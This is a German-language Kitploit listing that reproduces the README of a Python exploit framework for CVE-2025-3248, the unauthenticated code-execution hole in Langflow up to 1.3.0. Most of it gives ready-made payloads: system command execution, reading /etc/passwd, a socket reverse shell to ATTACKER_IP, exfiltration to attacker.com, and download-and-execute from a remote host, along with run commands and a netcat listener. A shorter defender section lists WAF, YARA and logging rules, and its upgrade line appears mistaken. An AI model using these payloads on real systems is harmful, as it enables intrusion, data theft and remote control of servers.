Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-3248-exploit — Ein umfassendes Python-Exploitation-Framework zum Testen und Demonstrieren von CVE-2025-3248, einer kritischen nicht authentifizierten Remote-Code-Ausführung-Sicherheitslücke in Langflow-Versionen ≤ 1.3.0. | Kitploit
Tools/GitHubGitHub/drackyjr/cve-2025-3248-exploit
SchwachstellenscannerCode-AnalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and ControlLernen & Bildung
Red Teaming
Payload-Entwicklung
GitHubdrackyjr/cve-2025-3248-exploit

cve-2025-3248-exploit

Ein umfassendes Python-Exploitation-Framework zum Testen und Demonstrieren von CVE-2025-3248, einer kritischen nicht authentifizierten Remote-Code-Ausführung-Sicherheitslücke in Langflow-Versionen ≤ 1.3.0.

Repository anzeigen
39vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-3248: Langflow Unauthenticated RCE-Schwachstellen-Scanner

License Python Status CVSS EPSS

Ein umfassendes Python-Exploitation-Framework zum Testen und Demonstrieren von CVE-2025-3248, einer kritischen unauthenticated Remote Code Execution-Schwachstelle in Langflow Versionen ≤ 1.3.0.


🔴 Schwachstellenübersicht

CVE-2025-3248: Langflow Code Injection RCE

EigenschaftWert
CVE IDCVE-2025-3248
ProduktLangflow
Betroffene Versionen≤ 1.3.0
SchwachstellentypNicht authentifizierte Remote Code Execution (RCE)
AngriffsvektorNetzwerk
Authentifizierung erforderlichKeine
CVSS-Score9.8 (Kritisch)
EPSS Score92.57%
CWECWE-94 (Unzureichende Kontrolle der Codegenerierung)
Verwundbarer Endpoint/api/v1/validate/code

Grundursache

Die Schwachstelle existiert im API-Endpoint /api/v1/validate/code, der beliebigen Python-Code akzeptiert und ihn mithilfe der unsicheren exec()-Funktion validiert, ohne ordnungsgemäße Eingabebereinigung oder Sandboxing. Die Schwachstelle nutzt das Verhalten von Python aus, bei dem:

  1. Dekorateure sofort ausgewertet werden während der Funktionsdefinition
  2. Standardargumentwerte ausgeführt werden während der Abstract Syntax Tree (AST)-Analyse
  3. Keine Eingabevalidierung existiert, um schädliche Codeausführung zu verhindern

Angriffskette

Angreifer → POST /api/v1/validate/code → Python exec() → RCE
     ↓
   Keine Authentifizierung erforderlich
     ↓
   Beliebiger Python-Code
     ↓
   Systembefehlsausführung

✨ Funktionen

  • ✅ Endpoint-Erkennung: Identifiziert automatisch verwundbare Langflow-Instanzen
  • ✅ Mehrstufiges Testen: 4 progressive Schwachstellentests
  • ✅ Befehlsausführung: Führt beliebige Systembefehle auf dem Ziel aus
  • ✅ Umgebungsextraktion: Ruft Umgebungsvariablen und Konfiguration ab
  • ✅ Dateioperationen: Testet Lese-/Schreibfähigkeiten von Dateien
  • ✅ Reverse-Shell-Unterstützung: Startet interaktive Reverse-Shell-Sitzungen
  • ✅ Versionserkennung: Identifiziert Langflow-Versionsinformationen
  • ✅ Farbcodierte Ausgabe: Verbesserte Lesbarkeit durch Terminalfarben
  • ✅ Timeout-Verwaltung: Konfigurierbare Request-Timeout
  • ✅ SSL/TLS-Umgehung: Unterstützung für selbstsignierte Zertifikate

📦 Voraussetzungen

Python >= 3.7
requests >= 2.25.0

Abhängigkeiten installieren

pip install requests

Optional (für bessere Protokollierung)

pip install colorama  # For Windows color support

🚀 Installation

Methode 1: Von GitHub klonen

git clone https://github.com/drackyjr/cve-2025-3248-exploit.git
cd cve-2025-3248-exploit
pip install -r requirements.txt
chmod +x cve_2025_3248_test.py

📖 Verwendung

Grundlegende Syntax

python3 cve_2025_3248_test.py -t <target_url> [options]

Schnellstart-Beispiele

1. Grundlegender Schwachstellenscan

python3 cve_2025_3248_test.py -t http://target.com

2. Benutzerdefinierten Befehl ausführen

python3 cve_2025_3248_test.py -t http://target.com -c "whoami"

3. Mehrere Befehle ausführen

python3 cve_2025_3248_test.py -t http://target.com -c "cat /etc/passwd"

4. Reverse-Shell-Exploitation (Nur autorisiertes Testen)

Schritt 1: Starten Sie einen netcat-Listener auf Ihrem Rechner

nc -lvnp 4444

Schritt 2: Führen Sie den Exploit aus

python3 cve_2025_3248_test.py -t http://target.com --exploit --lhost YOUR_IP --lport 4444

Beispiel:

python3 cve_2025_3248_test.py -t http://192.168.1.100:7860 --exploit --lhost 192.168.1.50 --lport 4444

5. Scan mit benutzerdefiniertem Timeout

python3 cve_2025_3248_test.py -t http://target.com --timeout 30

Kommandozeilenargumente

positional arguments:
  None

optional arguments:
  -t, --target TARGET       Ziel-URL (z. B. http://target.com) [ERFORDERLICH]
  -c, --command COMMAND     Auszuführender Befehl (Standard: id)
  --timeout TIMEOUT         Request-Timeout in Sekunden (Standard: 10)
  --exploit                 Exploitation-Modus aktivieren (Reverse Shell)
  --lhost LHOST            Ihre IP-Adresse für Reverse Shell
  --lport LPORT            Ihr Port für Reverse Shell
  -h, --help               Diese Hilfemeldung anzeigen

💾 Payload-Varianten

1. Dekorator-basierte Ausführung

payload = {
    "code": """
@exec("import os; os.system('whoami')")
def vulnerable_function():
    pass
"""
}

2. Standardargument-Ausführung

payload = {
    "code": """
def test(arg=exec("__import__('subprocess').check_output(['id'])")):
    pass
"""
}

3. Datenexfiltration

payload = {
    "code": """
def test(x=exec("import requests; requests.post('http://attacker.com/exfil', data=open('/etc/passwd').read())")):
    pass
"""
}

4. Reverse Shell (One-Liner)

payload = {
    "code": """
def shell(x=exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])")):
    pass
"""
}

5. Dateilesevorgänge

payload = {
    "code": """
def read_file(x=exec("print(open('/etc/passwd').read())")):
    pass
"""
}

6. Umgebungsvariablen-Aufzählung

payload = {
    "code": """
def enum_env(x=exec("import os; print('\\n'.join([f'{k}={v}' for k,v in os.environ.items()]))")):
    pass
"""
}

7. Herunterladen und Ausführen

payload = {
    "code": """
def download_exec(x=exec("import urllib.request; exec(urllib.request.urlopen('http://attacker.com/payload.py').read())")):
    pass
"""
}

🔍 Erkennung & Abwehr

Für Verteidiger

Sofortmaßnahmen

  1. Langflow aktualisieren

    pip install langflow>=1.3.0
    # or
    docker pull langflow:latest
    
  2. Netzwerkzugriff einschränken

    # Nginx reverse proxy - block vulnerable endpoint
    location /api/v1/validate/code {
        deny all;
    }
    
  3. Authentifizierung implementieren

    # Add authentication middleware
    @app.middleware("http")
    async def auth_middleware(request, call_next):
        if "/api/v1/validate/code" in request.url.path:
            if not verify_auth(request):
                return JSONResponse(status_code=401)
        return await call_next(request)
    

WAF-Regeln

ModSecurity-Regel:

SecRule ARGS:code "@contains exec" "id:1001,phase:2,deny"
SecRule ARGS:code "@contains subprocess" "id:1002,phase:2,deny"
SecRule ARGS:code "@contains __import__" "id:1003,phase:2,deny"
SecRule ARGS:code "@contains os.system" "id:1004,phase:2,deny"

Erkennungsregeln

YARA-Signatur:

rule CVE_2025_3248_Langflow_RCE {
    strings:
        $api_path = "/api/v1/validate/code"
        $exec = "exec("
        $subprocess = "subprocess"
        $os_system = "os.system"
    condition:
        $api_path and any of ($exec, $subprocess, $os_system)
}

Überwachung & Protokollierung

# Monitor for suspicious requests
tail -f /var/log/nginx/access.log | grep "/api/v1/validate/code"

# Alert on POST requests to vulnerable endpoint
auditctl -w /var/lib/langflow -p wa -k langflow_changes

Indikatoren für Kompromittierung (IoCs)

Tool herunterladen